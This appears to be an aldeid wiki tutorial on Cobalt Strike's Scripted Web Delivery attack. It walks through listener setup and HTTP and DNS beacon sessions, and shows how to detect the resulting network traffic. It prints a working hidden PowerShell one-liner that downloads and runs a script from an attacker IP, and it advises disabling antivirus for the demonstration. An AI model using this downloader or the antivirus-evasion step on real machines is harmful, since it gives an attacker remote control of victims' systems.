Cobalt-Strike/Attacks/Web-Drive-by/Scripted-Web-Delivery

From aldeid
Jump to navigation Jump to search
You are here
Scripted Web Delivery

Listener

Start by creating a listener (e.g. Beacon-HTTP or Beacon-DNS).

Attack

Attack preparation

From the menu, go to Attacks > Web Drive-by > Scripted Web delivery (S). The following window pops up:

HTTP-Beacon DNS-Beacon
Cobalt-strike-attacks-web-drive-by-scripted-web-delivery.png Cobalt-strike-attacks-web-drive-by-scripted-web-delivery-dns.png

Clicking on the Launch button will open a second popup window with the payload to copy.

Cobalt-strike-attacks-web-drive-by-scripted-web-delivery-payload.png

Payload example:

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://172.16.222.130:80/a'))"
Info.png
Information
This kind of payload is likely to be intercepted by an anti-virus (e.g. Windows Defender identified it as TrojanDownloader:PowerShell/Bynocco!AR!MTB). For the sake of demonstration, let's disable the anti-virus.

Beacon-HTTP

Exploitation

Once the payload is executed, a session appears in Cobalt Strike:

Cobalt-strike-session-example.png

Detection

Besides the anti-virus, here is what the network traffic looks like:

Initial payload

Cobalt-strike-wireshark-1-1.png

Cobalt-strike-wireshark-1-2.png

Request for action

Cobalt-strike-wireshark-1-3.png

Beacon-DNS

Exploitation

Once executed, the session will probably end up as an empty line. Right click on it and select Interact. Enter commands (e.g. mode dns, sleep 5) to force a feedback from the target.

Cobalt-strike-attack-web-drive-by-scripted-web-delivery-dns-session.png

Detection

Pay attention to the 2 highlighted blocks below:

  • the first block is the DNS traffic with actions (there is data)
  • the second block is the DNS traffic without action (pending for action, with a return of 0.0.0.0)

Cobalt-strike-attack-web-drive-by-scripted-web-delivery-dns-traffic-capture.png